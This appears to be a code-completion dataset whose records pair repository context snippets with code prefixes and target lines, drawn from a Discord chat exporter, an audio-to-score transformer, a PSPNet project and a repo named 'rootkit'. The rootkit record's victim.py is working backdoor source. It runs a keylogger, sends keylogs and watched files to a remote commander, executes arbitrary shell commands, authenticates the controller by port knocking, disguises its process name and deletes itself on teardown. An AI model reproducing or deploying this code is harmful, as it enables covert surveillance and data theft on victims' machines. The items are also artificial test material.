if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"): | s += colorify(prevtok + "]", color=color_for_tok(prevtok), form=color_format) | 0 | 2023-12-20 06:54:14+00:00 | 4k |
Varexa/Gateway | chat_exporter/construct/transcript.py | [
{
"identifier": "discord",
"path": "chat_exporter/ext/discord_import.py",
"snippet": ""
},
{
"identifier": "gather_messages",
"path": "chat_exporter/construct/message.py",
"snippet": "async def gather_messages(\r\n messages: List[discord.Message],\r\n guild: discord.Guild,\r\n pytz_timezone,\r\n military_time,\r\n) -> (str, dict):\r\n message_html: str = \"\"\r\n meta_data: dict = {}\r\n previous_message: Optional[discord.Message] = None\r\n\r\n for message in messages:\r\n content_html, meta_data = await MessageConstruct(\r\n message,\r\n previous_message,\r\n pytz_timezone,\r\n military_time,\r\n guild,\r\n meta_data\r\n ).construct_message()\r\n message_html += content_html\r\n previous_message = message\r\n\r\n message_html += \"</div>\"\r\n return message_html, meta_data\r"
},
{
"identifier": "Component",
"path": "chat_exporter/construct/assets/component.py",
"snippet": "class Component:\r\n styles = {\r\n \"primary\": \"#5865F2\",\r\n \"secondary\": \"#4F545C\",\r\n \"success\": \"#2D7D46\",\r\n \"danger\": \"#D83C3E\",\r\n \"blurple\": \"#5865F2\",\r\n \"grey\": \"#4F545C\",\r\n \"gray\": \"#4F545C\",\r\n \"green\": \"#2D7D46\",\r\n \"red\": \"#D83C3E\",\r\n \"link\": \"#4F545C\",\r\n }\r\n\r\n components: str = \"\"\r\n menus: str = \"\"\r\n buttons: str = \"\"\r\n menu_div_id: int = 0\r\n\r\n def __init__(self, component, guild):\r\n self.component = component\r\n self.guild = guild\r\n\r\n async def build_component(self, c):\r\n if isinstance(c, discord.Button):\r\n await self.build_button(c)\r\n elif isinstance(c, discord.SelectMenu):\r\n await self.build_menu(c)\r\n Component.menu_div_id += 1\r\n\r\n async def build_button(self, c):\r\n url = c.url if c.url else \"\"\r\n label = c.label if c.label else \"\"\r\n style = self.styles[str(c.style).split(\".\")[1]]\r\n icon = DiscordUtils.button_external_link if url else \"\"\r\n emoji = str(c.emoji) if c.emoji else \"\"\r\n\r\n self.buttons += await fill_out(self.guild, component_button, [\r\n (\"DISABLED\", \"chatlog__component-disabled\" if c.disabled else \"\", PARSE_MODE_NONE),\r\n (\"URL\", str(url), PARSE_MODE_NONE),\r\n (\"LABEL\", str(label), PARSE_MODE_MARKDOWN),\r\n (\"EMOJI\", str(emoji), PARSE_MODE_EMOJI),\r\n (\"ICON\", str(icon), PARSE_MODE_NONE),\r\n (\"STYLE\", style, PARSE_MODE_NONE)\r\n ])\r\n\r\n async def build_menu(self, c):\r\n placeholder = c.placeholder if c.placeholder else \"\"\r\n options = c.options\r\n content = \"\"\r\n\r\n if not c.disabled:\r\n content = await self.build_menu_options(options)\r\n\r\n self.menus += await fill_out(self.guild, component_menu, [\r\n (\"DISABLED\", \"chatlog__component-disabled\" if c.disabled else \"\", PARSE_MODE_NONE),\r\n (\"ID\", str(self.menu_div_id), PARSE_MODE_NONE),\r\n (\"PLACEHOLDER\", str(placeholder), PARSE_MODE_MARKDOWN),\r\n (\"CONTENT\", str(content), PARSE_MODE_NONE),\r\n (\"ICON\", DiscordUtils.interaction_dropdown_icon, PARSE_MODE_NONE),\r\n ])\r\n\r\n async def build_menu_options(self, options):\r\n content = []\r\n for option in options:\r\n if option.emoji:\r\n content.append(await fill_out(self.guild, component_menu_options_emoji, [\r\n (\"EMOJI\", str(option.emoji), PARSE_MODE_EMOJI),\r\n (\"TITLE\", str(option.label), PARSE_MODE_MARKDOWN),\r\n (\"DESCRIPTION\", str(option.description) if option.description else \"\", PARSE_MODE_MARKDOWN)\r\n ]))\r\n else:\r\n content.append(await fill_out(self.guild, component_menu_options, [\r\n (\"TITLE\", str(option.label), PARSE_MODE_MARKDOWN),\r\n (\"DESCRIPTION\", str(option.description) if option.description else \"\", PARSE_MODE_MARKDOWN)\r\n ]))\r\n\r\n if content:\r\n content = f'<div id=\"dropdownMenu{self.menu_div_id}\" class=\"dropdownContent\">{\"\".join(content)}</div>'\r\n\r\n return content\r\n\r\n async def flow(self):\r\n for c in self.component.children:\r\n await self.build_component(c)\r\n\r\n if self.menus:\r\n self.components += f'<div class=\"chatlog__components\">{self.menus}</div>'\r\n\r\n if self.buttons:\r\n self.components += f'<div class=\"chatlog__components\">{self.buttons}</div>'\r\n\r\n return self.components\r"
},
{
"identifier": "clear_cache",
"path": "chat_exporter/ext/cache.py",
"snippet": "def clear_cache():\r\n _internal_cache.clear()\r"
},
{
"identifier": "pass_bot",
"path": "chat_exporter/parse/mention.py",
"snippet": "def pass_bot(_bot):\r\n # Bot is used to fetch a user who is no longer inside a guild\r\n # This will stop the user from appearing as 'Unknown' which some people do not want\r\n global bot\r\n bot = _bot\r"
},
{
"identifier": "DiscordUtils",
"path": "chat_exporter/ext/discord_utils.py",
"snippet": "class DiscordUtils:\r\n logo: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-logo.svg'\r\n default_avatar: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-default.png'\r\n pinned_message_icon: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-pinned.svg'\r\n thread_channel_icon: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-thread.svg'\r\n file_attachment_audio: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-audio.svg'\r\n file_attachment_acrobat: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-acrobat.svg'\r\n file_attachment_webcode: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-webcode.svg'\r\n file_attachment_code: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-code.svg'\r\n file_attachment_document: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-document.svg'\r\n file_attachment_archive: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-archive.svg'\r\n file_attachment_unknown: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-unknown.svg'\r\n button_external_link: str = '<img class=\"chatlog__reference-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-external-link.svg\">'\r\n reference_attachment_icon: str = '<img class=\"chatlog__reference-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-attachment.svg\">'\r\n interaction_command_icon: str = '<img class=\"chatlog__interaction-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-command.svg\">'\r\n interaction_dropdown_icon: str = '<img class=\"chatlog__dropdown-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-dropdown.svg\">'"
},
{
"identifier": "fill_out",
"path": "chat_exporter/ext/html_generator.py",
"snippet": "PARSE_MODE_NONE = 0\r\nPARSE_MODE_NO_MARKDOWN = 1\r\nPARSE_MODE_MARKDOWN = 2\r\nPARSE_MODE_EMBED = 3\r\nPARSE_MODE_SPECIAL_EMBED = 4\r\nPARSE_MODE_REFERENCE = 5\r\nPARSE_MODE_EMOJI = 6\r\nasync def fill_out(guild, base, replacements):\r\ndef read_file(filename):\r"
}
] | import datetime
import html
import traceback
import pytz
from typing import List, Optional
from chat_exporter.ext.discord_import import discord
from chat_exporter.construct.message import gather_messages
from chat_exporter.construct.assets.component import Component
from chat_exporter.ext.cache import clear_cache
from chat_exporter.parse.mention import pass_bot
from chat_exporter.ext.discord_utils import DiscordUtils
from chat_exporter.ext.html_generator import (
fill_out, total, channel_topic, meta_data_temp, fancy_time, channel_subject, PARSE_MODE_NONE
)
| 1,976 |
class TranscriptDAO:
html: str
def __init__(
self,
|
class TranscriptDAO:
html: str
def __init__(
self,
| channel: discord.TextChannel,
| 0 | 2023-12-18 14:17:31+00:00 | 4k |
mariaalfaroc/a2s-transformer | networks/transformer/model.py | [
{
"identifier": "Decoder",
"path": "networks/transformer/decoder.py",
"snippet": "class Decoder(nn.Module):\n def __init__(\n self,\n # Classification layer\n output_size: int,\n # PE\n max_seq_len: int,\n # Embedding\n num_embeddings: int,\n embedding_dim: int = 256,\n padding_idx: int = 0,\n # Transformer\n ff_dim: int = 256,\n dropout_p: float = 0.1,\n nhead: int = 4,\n num_transformer_layers: int = 8,\n attn_window: int = -1, # -1 means \"no limit\"\n ):\n super(Decoder, self).__init__()\n\n # Input block\n self.embedding = nn.Embedding(\n num_embeddings=num_embeddings,\n embedding_dim=embedding_dim,\n padding_idx=padding_idx,\n )\n self.pos_1d = PositionalEncoding1D(\n max_len=max_seq_len,\n emb_dim=embedding_dim,\n dropout_p=dropout_p,\n )\n\n # Transformer block\n self.attn_window = attn_window\n self.transformer_decoder = nn.TransformerDecoder(\n decoder_layer=nn.TransformerDecoderLayer(\n d_model=embedding_dim,\n nhead=nhead,\n dim_feedforward=ff_dim,\n dropout=dropout_p,\n batch_first=True,\n ),\n num_layers=num_transformer_layers,\n )\n\n # Output/classification block\n self.out_layer = nn.Conv1d(\n in_channels=embedding_dim,\n out_channels=output_size,\n kernel_size=1,\n )\n\n def forward(self, tgt, memory, memory_len):\n # memory is the output of the encoder with the 2D PE added, flattened and permuted\n # memory.shape = [batch_size, src_sec_len, emb_dim]\n # src_sec_len = h * w (SPECTROGRAM UNFOLDING); emb_dim = out channels from encoder\n\n # tgt is the target sequence shifted to the right\n # tgt.shape = [batch_size, tgt_sec_len]\n\n # Embedding + 1D PE\n tgt_emb = self.pos_1d(\n self.embedding(tgt)\n ) # tgt_emb.shape = [batch_size, tgt_sec_len, emb_dim]\n\n # Get memory key padding mask\n # Ignore padding in the encoder output\n memory_key_padding_mask = self.get_memory_key_padding_mask(memory, memory_len)\n\n # Get tgt masks\n tgt_mask, tgt_key_padding_mask = self.get_tgt_masks(tgt)\n tgt_key_padding_mask = (\n None if memory_key_padding_mask is None else tgt_key_padding_mask\n ) # memory_key_padding_mask is None during inference\n\n # Transformer decoder\n tgt_pred = self.transformer_decoder(\n tgt=tgt_emb,\n memory=memory,\n tgt_mask=tgt_mask,\n memory_mask=None, # We let it see the whole encoder output\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n ) # tgt_pred.shape = [batch_size, tgt_sec_len, emb_dim]\n\n # Classification block\n tgt_pred = tgt_pred.permute(0, 2, 1).contiguous()\n tgt_pred = self.out_layer(\n tgt_pred\n ) # tgt_pred.shape = [batch_size, output_size, tgt_sec_len]\n\n return tgt_pred\n\n def get_memory_key_padding_mask(self, memory, memory_len):\n if memory_len is None:\n # During inference, the encoder output is not padded\n # We perform inference one sample at a time\n return None\n\n # When using batches, the spectrograms are padded to the same length\n # We need to mask the padding so the attention mechanism ignores it\n\n # memory.shape = [batch_size, src_sec_len, emb_dim]\n # memory_len.shape = [batch_size]\n # memory_pad_mask.shape = [batch_size, src_sec_len]\n # Value 1 (True) means \"ignored\" and value 0 (False) means \"not ignored\"\n memory_pad_mask = torch.zeros(\n memory.shape[:2], dtype=torch.bool, device=memory.device\n )\n for i, l in enumerate(memory_len):\n memory_pad_mask[i, l:] = True\n return memory_pad_mask\n\n @staticmethod\n def create_variable_window_mask( \n size, window_size, dtype=torch.float32, device=torch.device(\"cpu\")\n ):\n \"\"\"\n Creates a mask for the target sequence with a variable window size.\n\n Args:\n size (int): The size of the target sequence.\n window_size (int): The size of the window to focus on the last X tokens.\n\n Returns:\n torch.Tensor: The generated mask.\n \"\"\"\n mask = torch.full((size, size), float(\"-inf\"), dtype=dtype, device=device)\n for i in range(size):\n if window_size < size:\n start = max(0, i - window_size)\n mask[i, start : i + 1] = 0\n else:\n mask[i, : i + 1] = 0\n return mask\n\n def get_tgt_masks(self, tgt):\n # tgt.shape = [batch_size, tgt_sec_len]\n tgt_sec_len = tgt.shape[1]\n\n # Target = Decoder (we only let it see the past)\n # Upper triangular matrix of size (tgt_sec_len, tgt_sec_len)\n # The masked positions are filled with float('-inf')\n # Unmasked positions are filled with float(0.0)\n\n # ATTENTION WINDOW MECHANISM\n # We limit the number of past tokens the decoder can see\n if self.attn_window > 0:\n tgt_mask = self.create_variable_window_mask(\n tgt_sec_len, self.attn_window, device=tgt.device\n )\n else:\n tgt_mask = nn.Transformer.generate_square_subsequent_mask(\n tgt_sec_len, tgt.device\n )\n\n # 0 == \"<PAD>\"\n # Pad token to be ignored by the attention mechanism\n # Value 1 (True) means \"ignored\" and value 0 (False) means \"not ignored\"\n # tgt_pad_mask.shape = [batch_size, tgt_sec_len]\n tgt_pad_mask = tgt == 0\n return tgt_mask, tgt_pad_mask"
},
{
"identifier": "Encoder",
"path": "networks/transformer/encoder.py",
"snippet": "class Encoder(nn.Module):\n def __init__(self, in_channels, dropout=0.5):\n super(Encoder, self).__init__()\n self.conv_blocks = nn.ModuleList(\n [\n ConvBlock(in_c=in_channels, out_c=16, stride=(1, 1), dropout=dropout),\n ConvBlock(in_c=16, out_c=32, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=32, out_c=64, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=64, out_c=128, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=128, out_c=128, stride=(2, 1), dropout=dropout),\n ]\n )\n self.dscblocks = nn.ModuleList(\n [\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=256, stride=(1, 1), dropout=dropout),\n ]\n )\n\n def forward(self, x):\n for layer in self.conv_blocks:\n x = layer(x)\n\n for layer in self.dscblocks:\n xt = layer(x)\n x = x + xt if x.size() == xt.size() else xt\n\n return x"
},
{
"identifier": "HEIGHT_REDUCTION",
"path": "networks/transformer/encoder.py",
"snippet": "HEIGHT_REDUCTION = 16"
},
{
"identifier": "WIDTH_REDUCTION",
"path": "networks/transformer/encoder.py",
"snippet": "WIDTH_REDUCTION = 8"
},
{
"identifier": "compute_metrics",
"path": "my_utils/metrics.py",
"snippet": "def compute_metrics(y_true, y_pred):\n ################################# Sym-ER and Seq-ER:\n metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)\n ################################# MV2H:\n mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)\n metrics.update(mv2h_dict)\n return metrics"
},
{
"identifier": "IMG_HEIGHT",
"path": "my_utils/data_preprocessing.py",
"snippet": "IMG_HEIGHT = NUM_FREQ_BINS = 195"
},
{
"identifier": "NUM_CHANNELS",
"path": "my_utils/data_preprocessing.py",
"snippet": "NUM_CHANNELS = 1"
},
{
"identifier": "SOS_TOKEN",
"path": "my_utils/ar_dataset.py",
"snippet": "SOS_TOKEN = \"<SOS>\" # Start-of-sequence token"
},
{
"identifier": "EOS_TOKEN",
"path": "my_utils/ar_dataset.py",
"snippet": "EOS_TOKEN = \"<EOS>\" # End-of-sequence token"
}
] | import math
import random
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torchinfo import summary
from lightning.pytorch import LightningModule
from networks.transformer.decoder import Decoder
from networks.transformer.encoder import Encoder, HEIGHT_REDUCTION, WIDTH_REDUCTION
from my_utils.metrics import compute_metrics
from my_utils.data_preprocessing import IMG_HEIGHT, NUM_CHANNELS
from my_utils.ar_dataset import SOS_TOKEN, EOS_TOKEN | 2,864 |
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
)
|
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
) | self.decoder = Decoder( | 0 | 2023-12-18 20:01:00+00:00 | 4k |
YashsviG/rootkit | victim.py | [
{
"identifier": "port_knocking",
"path": "portknocker.py",
"snippet": "def port_knocking(victim_ip):\n \"\"\"\n Perform port knocking on the victim side to authenticate the commander.\n\n Args:\n victim_ip (str): IP address of the victim.\n\n Returns:\n tuple: IP address and port number if successful, None otherwise.\n \"\"\"\n potential_commanders = {}\n while True:\n packet = sniff(filter=f\"tcp and dst {victim_ip}\", count=1)[0]\n\n if TCP in packet and IP in packet:\n src_ip = packet[IP].src\n src_port = packet[TCP].dport\n\n if src_port in knock_ports:\n current_time = time.time()\n\n if src_ip not in potential_commanders:\n potential_commanders[src_ip] = []\n\n potential_commanders[src_ip].append((src_port, current_time))\n\n # Check if all knock ports have been hit within the timeout period\n print(potential_commanders)\n if len(potential_commanders[src_ip]) >= len(knock_ports):\n # Check for valid timestamps\n valid_timestamps = True\n for i, (port, timestamp) in enumerate(potential_commanders[src_ip]):\n if i == 0:\n continue\n\n previous_timestamp = potential_commanders[src_ip][i - 1][1]\n if abs(timestamp - previous_timestamp) > timeout:\n valid_timestamps = False\n potential_commanders.pop(src_ip)\n\n if valid_timestamps:\n # Successful port knocking sequence\n return src_ip, 7000\n\n # Wait for the next packet\n time.sleep(0.1)"
},
{
"identifier": "choose_process_name",
"path": "processname.py",
"snippet": "def choose_process_name():\n \"\"\"\n Choose a process name based on existing process names.\n\n Returns:\n str: Chosen process name.\n \"\"\"\n # Get a list of all existing process names\n existing_process_names = [p.name() for p in psutil.process_iter()]\n\n if existing_process_names:\n chosen_name = analyze_existing_process_names()\n else:\n chosen_name = \"nvme-update-wq\"\n\n print(f\"Process name chosen {chosen_name}\")\n return chosen_name"
},
{
"identifier": "get_ip_address",
"path": "utils.py",
"snippet": "def get_ip_address():\n \"\"\"\n Get the local IP address of the machine.\n\n Returns:\n str: Local IP address.\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((\"8.8.8.8\", 80))\n name = s.getsockname()[0]\n return name"
},
{
"identifier": "transfer_keylog_file",
"path": "utils.py",
"snippet": "def transfer_keylog_file(keylogger, covert, file_path):\n \"\"\"\n Transfer the keylog file.\n\n Args:\n keylogger (Keylogger): Keylogger instance.\n covert (CovertChannel): Covert channel instance.\n file_path (str): Path of the keylog file.\n\n Returns:\n int: Status code (3 if unsuccessful).\n \"\"\"\n if keylogger.get_status():\n print(\"VICTIM:: Cannot transfer, Keylogger running\")\n return 3\n \n if not os.path.exists(file_path):\n print(\"VICTIM:: keylog.txt does not exist\")\n return 3\n \n covert.cmd = 0\n covert.send_data(for_victim=False)\n covert.cmd = None\n covert.file_name = file_path\n covert.send_data(for_victim=False, event=\"IN_CREATE\")\n covert.file_name = None\n os.remove(file_path)"
},
{
"identifier": "check_exists",
"path": "utils.py",
"snippet": "def check_exists(path):\n \"\"\"\n Check if a file or directory exists.\n\n Args:\n path (str): Path to check.\n\n Returns:\n bool: True if exists, False otherwise.\n \"\"\"\n if os.path.exists(path):\n return True\n return False"
}
] | import argparse
import setproctitle
import shutil
from keylogger import *
from watcher import *
from portknocker import port_knocking
from processname import choose_process_name
from utils import get_ip_address, transfer_keylog_file, check_exists
| 2,122 | covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
|
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
i = check_exists(file)
if not i or watcher.get_status():
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
| proc_name = choose_process_name()
| 1 | 2023-12-19 18:54:22+00:00 | 4k |
SunHan0426/tree_location | pspnet/utils/callbacks.py | [
{
"identifier": "cvtColor",
"path": "pspnet/utils/utils.py",
"snippet": "def cvtColor(image):\r\n if len(np.shape(image)) == 3 and np.shape(image)[-2] == 3:\r\n return image \r\n else:\r\n image = image.convert('RGB')\r\n return image \r"
},
{
"identifier": "preprocess_input",
"path": "pspnet/utils/utils.py",
"snippet": "def preprocess_input(image):\r\n image /= 255.0\r\n return image\r"
},
{
"identifier": "resize_image",
"path": "pspnet/utils/utils.py",
"snippet": "def resize_image(image, size):\r\n iw, ih = image.size\r\n w, h = size\r\n\r\n scale = min(w/iw, h/ih)\r\n nw = int(iw*scale)\r\n nh = int(ih*scale)\r\n\r\n image = image.resize((nw, nh), Image.BICUBIC)\r\n new_image = Image.new('RGB', size, (128, 128, 128))\r\n new_image.paste(image, ((w-nw)//2, (h-nh)//2))\r\n\r\n return new_image, nw, nh\r"
},
{
"identifier": "compute_mIoU",
"path": "pspnet/utils/utils_metrics.py",
